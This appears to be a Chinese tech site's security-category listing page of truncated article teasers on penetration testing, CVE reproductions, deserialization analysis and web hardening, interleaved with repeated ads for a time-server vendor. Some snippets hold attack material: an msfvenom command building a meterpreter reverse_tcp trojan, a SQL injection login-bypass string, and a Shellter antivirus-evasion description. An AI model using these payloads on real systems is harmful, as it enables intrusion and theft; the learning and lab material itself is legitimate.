经验首页 前端设计 程序设计 Java相关 移动开发 数据库/运维 软件/图像 大数据/云计算 其他经验
 网络安全

代理配置

cmd代理   cmd配置代理: set http_proxy=http: 199.199.199.199:9999   cmd清除代理:reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings...[2020/5/25]

【WebGoat】0X00 安装教程

一、什么是 WebGoatWebGoat 是 OWASP 组织研制出的用于进行 web 漏洞实验的应用平台,用来说明 web应用中存在的安全漏洞。WebGoat 运行在带有 java 虚拟机的平台之上,当前提供的训练课程有 30 多个,其中包括:跨站点脚本攻击(XSS)、访问控制、线程安...[2020/5/21]

Enjoy the pain about Moloch

Enjoy the pain about Moloch

这echo出来的啥子嘛?意思是小姐姐有自虐倾向?可若是moloch有汉化包或翻译文件,小姐姐至于这么“享受”install的过程吗?   过程都走过了,那就记录一下吧:1.找个Ubuntu镜像,阿里云镜像不一定合适,可能需要换清华大学开源软件镜像...[2020/5/21]

京准电子,北斗授时产品取代GPS对时设备服务各行业

京准电子,北斗授时产品取代GPS对时设备服务各行业 京准电子,北斗授时产品取代GPS对时设备服务各行业 索取更多资料添+京准电子科技VX——ahjzsz 全篇引言: 对于一个迈入信息社会的现代化大国,导航定位和授时系统至为重要,称之为“最关键的...[2020/5/19]

kali 免杀工具shellter安装以及使用

Shellter 是一款动态 shellcode 注入工具,我们可以将shellcode注入到其它程序上,从而来躲避杀毒软件的查杀。俗称为免杀 官网:https: www.shellterproject.com/  目前最新版本是7.2,主程序是.exe文件所以在window...[2020/5/19]

挖洞入门_谷歌语法

挖洞入门_谷歌语法

回想这些年,总感觉忘得总比学得快,思前想后,打算以后通过写播客的形式来记录自己的学习过程。博主是个安全行业刚入门的小白,如有错误也请大佬不吝指教。 0x01:维基百科 0x02:常用语法 字符 * - 通配符 - - 排除项 "" - 整体词 ...[2020/5/18]

关于医院NTP授时服务器(NTP校时服务器)部署工作

关于医院NTP授时服务器(NTP校时服务器)部署工作关于医院NTP授时服务器(NTP校时服务器)部署工作 京准电子科技更多NTP授时服务器资料请加VX——ahjzsz 1.究竟要不要关心医院子母钟系统的配置? 子母钟系统的建成,人们真正得益的是子钟等终端所提...[2020/5/18]

使用sqlmap

使用sqlmap

实验环境要求: 1、安装win7或win10的笔记本或PC电脑一台,硬盘100GB,内存8GB 2、安装VMware? Workstation 14以上 总体目标:基于centos7搭建dvwa web服务靶机,使用主机上的浏览器和kali虚拟机作为攻击机...[2020/5/14]

metasploit 生成木马常用命令

生成反弹木马: 1.  msfvenom -p window meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=4444 -f exe > abc.exe    exe文件 2.  msfv...[2020/5/13]

Vulnhb 靶场系列:Jarbas1.0

靶场镜像 官网 信息收集 攻击机kali IP地址 通过nmap 进行主机发现,发现目标机IP地址 nmap -sP 192.168.227.1/24 参数说明: -sP (Ping扫描) 该选项告诉Nmap仅仅 进行ping扫描 (主机发现),然后打印出对扫描做出...[2020/5/13]

NTP校时(网络对时服务器)IPC网络摄像机时钟同步

NTP校时(网络对时服务器)IPC网络摄像机时钟同步

NTP校时(网络对时服务器)IPC网络摄像机时钟同步 更多资料添加京准电子科技官微——ahjzsz 有时候我们去查看录像发现无法正常查到录像并回放录像,排查了硬盘状态和录像计划都是没有问题的,还有什么需要我们去确认下呢? 这个时候我们可以去看下设备时间,可能...[2020/5/11]

GPS网络校时服务器运行体系说明,京准电子科技

GPS网络校时服务器运行体系说明,京准电子科技 GPS网络校时服务器系统,应用于整个时间频率体系中,若要搭建一套完成的系统,就必须满足于系统的产生性和受检性,存在及监查性。 本文主要基于GPS网络校时服务器系统所输出的时间接口协议,对相对的接口协议产生的时间测试问题进行说明 1、G...[2020/5/7]

Kali Linux 2020.1安装以及安装后要做的事

一、下载 https: www.kali.org/download 根据自己情况选择,我是要安装在虚拟机里,用不上live,所以我选的是 二、虚拟机安装 我的安装环境是Vmware 15.5,因为安装过程中需要联网,请准备好网络。 1、创建虚拟机 这里仅列出重要步骤 2、开始安装...[2020/5/6]

卫星对时系统,GPS卫星对时系统,京准电子科技

卫星对时系统,GPS卫星对时系统,京准电子科技 卫星对时系统,GPS卫星对时系统,京准电子科技 官微 ahjzsz  随时欢迎你来撩。 医院数字网络时钟系统 系统构成:GPS网络中心母钟+交换机+各医疗场所子钟 子钟位置:医院ICU、CCU、DSA、手术室、影像中心、...[2020/4/29]

医院信息化管理系统(HIS)与医院网络时钟系统

医院信息化管理系统(HIS)与医院网络时钟系统 医院信息化管理系统(HIS)与医院网络时钟系统 安徽京准电子科技 联系官微 ahjzsz  优化的病人就诊流程       系统以“服务病人&rdquo...[2020/4/29]

GPS北斗卫星对时系统,LED时钟显示屏,京准电子科技

GPS北斗卫星对时系统,LED时钟显示屏,京准电子科技 GPS北斗卫星对时系统,LED时钟显示屏,京准电子科技 GPS北斗卫星对时系统,LED时钟显示屏,京准电子科技   网络子钟调试使用说明书 (NTP网络版)  微X撩我 ——ah...[2020/4/28]

Google免费新书-《构建安全&可靠的系统》

前段时间riusksk在公众号分享的Google安全团队的新书,好书,全英原版,开源免费。 免费下载地址:https: tatic.googleusercontent.com/media/landing.google.com/zh-CN re tatic/pdf/SRS.pdf r...[2020/4/24]

通达OA前台cookie伪造任意登录漏洞复现

通达OA前台cookie伪造登录漏洞复现 0X00前言 通达OA是一套办公系统。2020年04月17日, 通达OA官方在更新了一个v11版本安全补丁, 其中修复了一个任意用户伪造登录漏洞。 0X01漏洞概述 该漏洞类型为任意用户伪造,未经授权的远程攻击者可以通过精心构造的请求包进...[2020/4/24]

网络校时设备,卫星对时服务器—京准电子科技

网络校时设备,卫星对时服务器—京准电子科技 网络校时设备,卫星对时服务器—京准电子科技 京准电子科技 网址 ahjzsz.com  官微 ahjzsz 网络校时设备,卫星对时服务器—京准电子科技 浅谈电力系统中的时钟同步技术 电力系...[2020/4/24]

网站被挂马紧急响应及恢复

某天,正安逸地划水,突然收到情报,公司某网站被黑了。惊得我一跳,这可不是一件小事 一、安全排查 赶紧搜索了一下网站关键词,标题已经被篡改了 点进去,加载缓慢,并自动跳转到了某博彩网站 查看网站源代码,可以看到有多处异常 在线编码转换,对应上了被篡改的内容 关...[2020/4/24]

CVE-2020-0796 SMBv3漏洞复现(含rce poc)

CVE-2020-0796 SMBv3漏洞复现(含rce poc) 0X00前言 漏洞详情请查看https: www.cnblogs.com/L0ading/p/12519325.html 0X01 RCE脚本利用成功截图 0X03脚本获取 如需获取脚本请加博主qq1191...[2020/4/23]

IDA FLIRT使用

IDA FLIRT/FLAIR FLIRT是IDA提供的一种函数识别技术,即库文件快速识别与鉴定技术(Fast Library Identification and Recognition Technology)。这项技术使IDA能在一系列编译器的标准库文件里自动找出调用的函数,使反汇编...[2020/4/19]

Tomcat AJP 文件包含漏洞(CVE-2020-1938)漏洞复现

Tomcat AJP 文件包含漏洞(CVE-2020-1938)漏洞复现

漏洞简介 该漏洞是由于Tomcat AJP协议存在缺陷而导致,攻击者利用该漏洞可通过构造特定参数,读取服务器webapp下的任意文件。若目标服务器同时存在文件上传功能,攻击者可进一步实现远程代码执行。 影响范围 Apache Tomcat 6 Apache&nbs...[2020/4/16]

CVE-2016-7124php反序列化漏洞复现

CVE-2016-7124php反序列化漏洞复现 0X00漏洞原因 如果存在__wakeup方法,调用 unserilize() 方法前则先调用__wakeup方法,但是序列化字符串中表示对象属性个数的值大于 真实的属性个数时会跳过__wakeup的执行 0X01漏洞影响版本 P...[2020/4/15]

PHP SESSION反序列化本地样例分析

PHP SESSION反序列化本地样例分析 0X00漏洞原因 主要原因是: ini_set(‘se ion.serialize_handler’, ‘php_serialize’);        ini_set(‘se ...[2020/4/15]

NTP对时器(NTP对时服务器)重要性!京准电子科技

NTP对时器(NTP对时服务器)重要性!京准电子科技

NTP对时器(NTP对时服务器)重要性!京准电子科技 NTP对时器(NTP对时服务器)重要性!京准电子科技 NTP时间同步的重要性——架设HR-901GB型ntp对时服务器 安徽京准电子科技 时间同步技术必定将是整个大数据处理系统的重要支撑和保障。时间同步技...[2020/4/15]

网络安全之数字签名

数字签名定义 数字签名就是对数字信息进行签名,以防止他人对信息进行伪造和篡改,也可以用于身份识别 数字签名的特性 签名是可信的 签名的信息是不可篡改的 签名是不可复制的 签名是不可伪造的 签名是不可抵赖的 简而言之,某人对某信息进行签名可以证明:这个信息是这个人写的,且无其他人...[2020/4/15]

远程电子数据取证-解决驱动级文件隐藏挂马

背景故事: 首先我们查看网站根目录发现没有seo文件,可能做了隐藏,第一反应是显示隐藏文件夹 结果发现还是没有出现想要的文件,文件搜索也只是看到seo快捷键 因为这里用了驱动级文件隐藏驱动级隐藏文件会在服务项增加一个xlkfs的服务特征为系统目录下存在如下文件: C:\WINDOWS\...[2020/4/10]

京准GPS授时服务器完成焉耆县人民医院的网络对时工作

京准GPS授时服务器完成焉耆县人民医院的网络对时工作 京准GPS授时服务器完成焉耆县人民医院的网络对时工作 京准电子科技开发设计的GPS授时服务器,ntp网络时间服务器,北斗卫星时钟 官 微 ——  ahjzsz 近日,由我司供应的HR系列GPS...[2020/4/8]

15条实用的预防Dede织梦网站被挂马方法_dedecms

15条实用的预防Dede织梦网站被挂马方法_dedecms

对刚开始学习Dede织梦建站的同学,当在本地调试好网站上传到服务器后,在没有采取防护的情况下,网站很容易被挂马,挂马后,网站首页会被篡改,或者网站被恶意跳转到别的不相关的网站上。所以为了避免这种情况的发生,jb51整理以一些关于“Dede织梦网站被挂马原因及解决办法”能帮助...[2020/4/7]

常用的一些web目录扫描工具

常用的一些web目录扫描工具

常用的一些web目录扫描工具 0X00目录扫描工具的作用 网站目录和敏感文件扫描是网站测试中最基本的手段之一。如果通过该方法发现了网站后台,可以尝试暴库、SQL注入等方式进行安全测试;如果发现敏感目录或敏感文件,能帮我们获取如php环境变量、robots.txt、网站指纹等信息;如果...[2020/4/2]

GPS时间同步服务器在网络摄像机配置应用

GPS时间同步服务器在网络摄像机配置应用 GPS时间同步服务器在网络摄像机配置应用 安徽京准电子科技开发的GPS校时同步服务器产品 网络摄像机相比于模拟摄像机的功能多增加了数字化压缩控制器和基于WEB管理界面的操作系统和内部时钟系统(可自行走时、也可获取外部时间作为基准),使得拍摄...[2020/4/2]

Fiddler系列一:Fiddler网络爬虫工具介绍

《Fiddler系列一:Fiddler网络爬虫工具介绍》 前言 本文来源属于网络资源整理,是将多位大神讲解的优秀知识点以及自己的实践操作加理解再次重新整合在一块儿,希望对大家有所帮助。如有冒犯敬请谅解,请第一时间联系,邮箱:1294801384@qq.com 我们将积极配合处理! 如果...[2020/4/1]

北斗授时系统,GPS授时服务器—在行业应用及介绍

北斗授时系统,GPS授时服务器—在行业应用及介绍 北斗授时系统,GPS授时服务器—在行业应用及介绍 将局域网上各种需要同步时钟的设备的时间信息基于北斗时间偏差限定在足够小的范围内,这种时钟系统便就叫做北斗授时系统。任何时间应用系统都应该具有维持时间增长和缩减,...[2020/3/30]

网络安全从入门到精通(第四章-2)GET&POST&HEAD注入

本文内容: GET注入 POST注入 Head注入 sqlmap工具注入 get&post为显错注入: head为报错注入: 1,GET注入:   get注入属于显错注入。     1.判断注入点:       最古老的的方法是:         http: ...[2020/3/30]

GPS授时器(GPS卫星授时器)常用的同步方式

GPS授时器(GPS卫星授时器)常用的同步方式GPS授时器(GPS卫星授时器)常用的同步方式 GPS授时器是由安徽京准科技开发的一款高科技产品,更多产品资料查阅 www.ahjzsz.com 卫星授时是通过导航卫星来进行发播或转播标准时间信号的授时手段。凭借授时成本低,精度高,实现简...[2020/3/26]

信息安全之私密文件隐藏 - Hakka-Youth

  目录导航 1、如何隐藏文件[方法1] 2、如何隐藏文件[方法2] 3、如何访问隐藏文件 4、如何取消文件隐藏   私密文件啊,肯定是不想让他人随意就能看到的东西了,比如那啥照片啊、那啥视频啊,你应该懂的。 哈哈,言归正传,我这里所说的文件指的是以某...[2020/3/25]

GPS授时服务器(卫星同步时钟)科普小知识

GPS授时服务器(卫星同步时钟)科普小知识

GPS授时服务器(卫星同步时钟)科普小知识 GPS授时服务器(卫星同步时钟)科普小知识 HR-901GB型卫星同步时钟(GPS授时服务器)是安徽京准电子科技开发的一款高科技产品。 GPS卫星时钟(GPS授时系统,北斗网络同步时钟,GPS对时产品)是安徽京准电子科技有限公司自主研发生...[2020/3/25]

北斗对时服务器(NTP时钟服务器)在SCADA系统中的应用

北斗对时服务器(NTP时钟服务器)在SCADA系统中的应用 北斗对时服务器(NTP时钟服务器)在SCADA系统中的应用 安徽京准电子科技开发的HR-901GB型GPS校时器-网络授时服务器 为SCADA系统时刻服务。 前言 jfeikx47824jfjf  &n...[2020/3/25]

GPS和北斗卫星授时技术在时频领域的应用和发展

GPS和北斗卫星授时技术在时频领域的应用和发展  安徽京准科技 www.ahjzsz.com   咨询微♥ ahjzsz 一、GPS信息与信息时代    信息时代的特点:一是信息量急剧增加(如需海量存储器);二是信息传输的数字化...[2020/3/25]

网络安全从入门精通 (第二章-7) 正则表达式

本文内容: 什么是正则表达式 PHP中正则表达式常用函数 正则表达式语法   1,什么是正则表达式?   正则表达式:又称规则表达式,在计算机科学的一个概念,正则表达式通常替换哪些符合某个模式(规则)的文本。   正则表达式特点:     1.灵活性、逻辑性和功...[2020/3/25]

NTP时间同步服务器(NTP时间服务器)在北京邮电大学的应用案例

NTP时间同步服务器(NTP时间服务器)在北京邮电大学的应用案例

NTP时间同步服务器(NTP时间服务器)在北京邮电大学的应用案例 安徽京准科技提供 微♥ ahjzsz 近期,我公司自主研发生产的NTP时间同步服务器在北京邮电大学成功投运,为南京邮电大学提供一个标准时间信息,为后期科研项目提供有力的时间保障。 一、系统工作原理 &...[2020/3/24]

实现数据库安全性控制的方法和主要技术。

实现数据库安全性控制的方法和主要技术。

(1)用户标识和鉴别: 该方法由系统提供一定的方式让用户标识自己的名字或身份。每次用户要求进入系统时,由系统进行核对,通过鉴定后才能提供系统的使用权   (2)存取控制 通过用户权限定义和合法权检查确保只有合法权限的用户访问数据库,所有未授权的人员无法存取数据 &nb...[2020/3/23]

SQL注入漏洞过程实例及解决方案

代码示例: public cla JDBCDemo3 { public static void demo3_1(){ boolean flag=login("aaa'' OR '' ","1651561"); 若已知用户名,用这种方式便可不用知道密码就可登陆成功 ...[2020/3/20]

Upload-labs 测试笔记

Upload-labs 测试笔记 By:Mirror王宇阳 2019年11月~ 文件上传解析学习 环境要求 若要自己亲自搭建环境,请按照以下配置环境,方可正常运行每个Pa 。 配置 项 配置 描述 操作系统 Window or Linux 推荐使用Windows,...[2020/3/17]

洞察漏洞管理平台实践

洞察是宜信安全部用来对公司内部系统所出现的安全漏洞进行线上全生命周期管理的漏洞管理平台,于2018年4月下旬对外开源。感谢宜信安全应急响应中心的开源,给企业和安全从业者带来一个很好的漏洞管理系统。   GitHub项目地址:https: github.com/credite...[2020/3/16]

java反序列化-ysoserial-调试分析总结篇(7)

前言: CommonsCollections7外层也是一条新的构造链,外层由hashtable的readObject进入,这条构造链挺有意思,因为用到了hash碰撞 yso构造分析: 首先构造进行rce所需要的转换链,这里也用的是chianed里面套Constantrans+i...[2020/3/9]

java反序列化-ysoserial-调试分析总结篇(6)

前言: 这篇记录CommonsCollections6的调试,外层也是新的类,换成了hashset,即从hashset触发其readObject(),yso给的调用链如下图所示 利用链分析: 首先在hashset内部首先获取器容量与负载因子等操作,然后创建hashmap,将Ob...[2020/3/6]

java反序列化-ysoserial-调试分析总结篇(5)

java反序列化-ysoserial-调试分析总结篇(5)

前言: 这篇文章继续分析commonscollections5,由如下调用链可以看到此时最外层的类不是annotationinvoke,也不是priorityqueue了,变成了badattribute 该类要求没有配置security manager 利用链分析: 首先在b...[2020/3/5]

java反序列化-ysoserial-调试分析总结篇(4)

1.前言 这篇文章继续分析commoncollections4利用链,这篇文章是对cc2的改造,和cc3一样,cc3是对cc1的改造,cc4则是对cc2的改造,里面chained的invoke变成了instantiateTransformer,所以不用invoke反射调用方法,所以外层q...[2020/3/4]

124
2
记录数:505 页数:1/1112345678910下一页尾页
加载更多
 友情链接: NPS